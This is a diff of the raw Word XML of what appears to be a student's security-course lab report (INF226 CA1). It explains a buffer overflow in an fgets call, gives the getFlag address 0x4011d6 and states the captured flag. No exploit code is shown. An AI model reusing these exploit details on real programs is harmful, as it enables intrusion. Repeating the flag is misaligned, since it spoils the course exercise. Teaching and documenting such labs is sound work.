-          <w:kern w:val="0"/>
-          <w:lang w:val="nb-NO"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t> </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>As the output shows, the flag for task 01 is</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:u w:val="single"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>INF226{d3 h0ly gra1l}</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t> </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t> </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t> </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t> </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t> </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t> </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t> </w:t>
-      </w:r>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
     </w:p>
     <w:sectPr>
-      <w:headerReference w:type="default" r:id="rId12"/>
-      <w:footerReference w:type="default" r:id="rId13"/>
+      <w:headerReference w:type="default" r:id="rId16"/>
+      <w:footerReference w:type="default" r:id="rId17"/>
       <w:pgSz w:w="12240" w:h="15840"/>
       <w:pgMar w:top="1417" w:right="1417" w:bottom="1417" w:left="1417" w:header="720" w:footer="720" w:gutter="0"/>
       <w:cols w:space="720"/>
@@ -1915,7 +5771,6 @@
         <w:docPartUnique/>
       </w:docPartObj>
     </w:sdtPr>
-    <w:sdtEndPr/>
     <w:sdtContent>
       <w:sdt>
         <w:sdtPr>
@@ -1928,7 +5783,6 @@
             <w:docPartUnique/>
           </w:docPartObj>
         </w:sdtPr>
-        <w:sdtEndPr/>
         <w:sdtContent>
           <w:p>
             <w:pPr>
@@ -2949,7 +6803,7 @@
   <w:style w:type="paragraph" w:default="1" w:styleId="Normal">
     <w:name w:val="Normal"/>
     <w:qFormat/>
-    <w:rsid w:val="002F048F"/>
+    <w:rsid w:val="0031552A"/>
   </w:style>
   <w:style w:type="paragraph" w:styleId="Heading1">
     <w:name w:val="heading 1"/>
@@ -3113,6 +6967,18 @@
     <w:link w:val="Footer"/>
     <w:uiPriority w:val="99"/>
     <w:rsid w:val="0026247D"/>
+  </w:style>
+  <w:style w:type="character" w:styleId="Hyperlink">
+    <w:name w:val="Hyperlink"/>
+    <w:basedOn w:val="DefaultParagraphFont"/>
+    <w:uiPriority w:val="99"/>
+    <w:semiHidden/>
+    <w:unhideWhenUsed/>
+    <w:rsid w:val="0031552A"/>
+    <w:rPr>
+      <w:color w:val="0000FF"/>
+      <w:u w:val="single"/>
+    </w:rPr>
   </w:style>
 </w:styles>
 </file>
@@ -3413,23 +7279,6 @@
 </file>
 
 <file path=customXml/item1.xml><?xml version="1.0" encoding="utf-8"?>
-<p:properties xmlns:p="http://schemas.microsoft.com/office/2006/metadata/properties" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:pc="http://schemas.microsoft.com/office/infopath/2007/PartnerControls">
-  <documentManagement>
-    <_activity xmlns="96aa0b68-977f-4d68-9084-1e0376ff8ae9" xsi:nil="true"/>
-  </documentManagement>
-</p:properties>
-</file>
-
-<file path=customXml/item2.xml><?xml version="1.0" encoding="utf-8"?>
-<?mso-contentType ?>
-<FormTemplates xmlns="http://schemas.microsoft.com/sharepoint/v3/contenttype/forms">
-  <Display>DocumentLibraryForm</Display>
-  <Edit>DocumentLibraryForm</Edit>
-  <New>DocumentLibraryForm</New>
-</FormTemplates>
-</file>
-
-<file path=customXml/item3.xml><?xml version="1.0" encoding="utf-8"?>
 <ct:contentTypeSchema xmlns:ct="http://schemas.microsoft.com/office/2006/metadata/contentType" xmlns:ma="http://schemas.microsoft.com/office/2006/metadata/properties/metaAttributes" ct:_="" ma:_="" ma:contentTypeName="Document" ma:contentTypeID="0x0101007BCD34C5F2D32C4AAAB044270ECA57DA" ma:contentTypeVersion="9" ma:contentTypeDescription="Create a new document." ma:contentTypeScope="" ma:versionID="63e273ac3b51b78697e2c3ceb21950bb">
   <xsd:schema xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:p="http://schemas.microsoft.com/office/2006/metadata/properties" xmlns:ns3="96aa0b68-977f-4d68-9084-1e0376ff8ae9" targetNamespace="http://schemas.microsoft.com/office/2006/metadata/properties" ma:root="true" ma:fieldsID="1452b4192b6f4abe265f2bac6a64a404" ns3:_="">
     <xsd:import namespace="96aa0b68-977f-4d68-9084-1e0376ff8ae9"/>
@@ -3607,31 +7456,24 @@
 </ct:contentTypeSchema>
 </file>
 
-<file path=customXml/itemProps1.xml><?xml version="1.0" encoding="utf-8"?>
-<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{654B8BEF-E3F8-4FF9-8A76-CDEC00BB12AB}">
-  <ds:schemaRefs>
-    <ds:schemaRef ds:uri="http://purl.org/dc/elements/1.1/"/>
-    <ds:schemaRef ds:uri="http://purl.org/dc/dcmitype/"/>
-    <ds:schemaRef ds:uri="http://schemas.microsoft.com/office/2006/metadata/properties"/>
-    <ds:schemaRef ds:uri="http://www.w3.org/XML/1998/namespace"/>
-    <ds:schemaRef ds:uri="http://schemas.microsoft.com/office/2006/documentManagement/types"/>
-    <ds:schemaRef ds:uri="http://schemas.openxmlformats.org/package/2006/metadata/core-properties"/>
-    <ds:schemaRef ds:uri="http://schemas.microsoft.com/office/infopath/2007/PartnerControls"/>
-    <ds:schemaRef ds:uri="96aa0b68-977f-4d68-9084-1e0376ff8ae9"/>
-    <ds:schemaRef ds:uri="http://purl.org/dc/terms/"/>
-  </ds:schemaRefs>
-</ds:datastoreItem>
+<file path=customXml/item2.xml><?xml version="1.0" encoding="utf-8"?>
+<?mso-contentType ?>
+<FormTemplates xmlns="http://schemas.microsoft.com/sharepoint/v3/contenttype/forms">
+  <Display>DocumentLibraryForm</Display>
+  <Edit>DocumentLibraryForm</Edit>
+  <New>DocumentLibraryForm</New>
+</FormTemplates>
 </file>
 
-<file path=customXml/itemProps2.xml><?xml version="1.0" encoding="utf-8"?>
-<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{0CB023CB-C7AB-4C92-9D10-9255653953CE}">
-  <ds:schemaRefs>
-    <ds:schemaRef ds:uri="http://schemas.microsoft.com/sharepoint/v3/contenttype/forms"/>
-  </ds:schemaRefs>
-</ds:datastoreItem>
+<file path=customXml/item3.xml><?xml version="1.0" encoding="utf-8"?>
+<p:properties xmlns:p="http://schemas.microsoft.com/office/2006/metadata/properties" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:pc="http://schemas.microsoft.com/office/infopath/2007/PartnerControls">
+  <documentManagement>
+    <_activity xmlns="96aa0b68-977f-4d68-9084-1e0376ff8ae9" xsi:nil="true"/>
+  </documentManagement>
+</p:properties>
 </file>
 
-<file path=customXml/itemProps3.xml><?xml version="1.0" encoding="utf-8"?>
+<file path=customXml/itemProps1.xml><?xml version="1.0" encoding="utf-8"?>
 <ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{4C90A798-53B0-4DA2-8331-5495FD97601A}">
   <ds:schemaRefs>
     <ds:schemaRef ds:uri="http://schemas.microsoft.com/office/2006/metadata/contentType"/>
@@ -3647,4 +7489,22 @@
     <ds:schemaRef ds:uri="http://schemas.microsoft.com/internal/obd"/>
   </ds:schemaRefs>
 </ds:datastoreItem>
+</file>
+
+<file path=customXml/itemProps2.xml><?xml version="1.0" encoding="utf-8"?>
+<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{0CB023CB-C7AB-4C92-9D10-9255653953CE}">
+  <ds:schemaRefs>
+    <ds:schemaRef ds:uri="http://schemas.microsoft.com/sharepoint/v3/contenttype/forms"/>
+  </ds:schemaRefs>
+</ds:datastoreItem>
+</file>
+
+<file path=customXml/itemProps3.xml><?xml version="1.0" encoding="utf-8"?>
+<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{654B8BEF-E3F8-4FF9-8A76-CDEC00BB12AB}">
+  <ds:schemaRefs>
+    <ds:schemaRef ds:uri="http://schemas.microsoft.com/office/2006/metadata/properties"/>
+    <ds:schemaRef ds:uri="http://schemas.microsoft.com/office/infopath/2007/PartnerControls"/>
+    <ds:schemaRef ds:uri="96aa0b68-977f-4d68-9084-1e0376ff8ae9"/>
+  </ds:schemaRefs>
+</ds:datastoreItem>
 </file>
--- a/CA1/CA1_INF226_fha040.docx
+++ b/CA1/CA1_INF226_fha040.docx
@@ -1855,6 +1855,7 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:noProof/>
           <w:kern w:val="0"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
@@ -2018,14 +2019,135 @@
           <w14:ligatures w14:val="none"/>
         </w:rPr>
       </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t> </w:t>
-      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:outlineLvl w:val="1"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="2E75B5"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="nb-NO"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="2E75B5"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="nb-NO"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>Vulnerability</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">The buffer overflow vulnerability in this program lies in the fgets call, which reads the input to the program. There is no restriction on the size of input to the buffer, which means that an attacker can exploit it by inputing more than 16 bytes and thus overwrite the stack. </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
     </w:p>
     <w:p>
       <w:pPr>
@@ -3217,6 +3339,7 @@
           <w:kern w:val="0"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t> </w:t>
       </w:r>
     </w:p>
@@ -3364,6 +3487,14 @@
           <w:kern w:val="0"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
+        <w:t>o</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
         <w:t> </w:t>
       </w:r>
     </w:p>
@@ -3382,9 +3513,348 @@
           <w:kern w:val="0"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t> </w:t>
       </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>Notes</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0292A2C7" wp14:editId="0297B3A3">
+            <wp:extent cx="5972810" cy="2037080"/>
+            <wp:effectExtent l="0" t="0" r="8890" b="1270"/>
+            <wp:docPr id="387336901" name="Picture 1" descr="A screen shot of a computer program&#10;&#10;Description automatically generated"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="387336901" name="Picture 1" descr="A screen shot of a computer program&#10;&#10;Description automatically generated"/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId12"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5972810" cy="2037080"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">The objdump for &lt;getFlag&gt; shows that the function begins at address 0x4011d6. </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>Plotting frames 01 into the XXXX, I see that the getFlag stack frame is of size 16:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="596FA3C5" wp14:editId="53E05C3D">
+            <wp:extent cx="5972810" cy="1351915"/>
+            <wp:effectExtent l="0" t="0" r="8890" b="635"/>
+            <wp:docPr id="347535525" name="Picture 1" descr="A screenshot of a computer&#10;&#10;Description automatically generated"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="347535525" name="Picture 1" descr="A screenshot of a computer&#10;&#10;Description automatically generated"/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId13"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5972810" cy="1351915"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
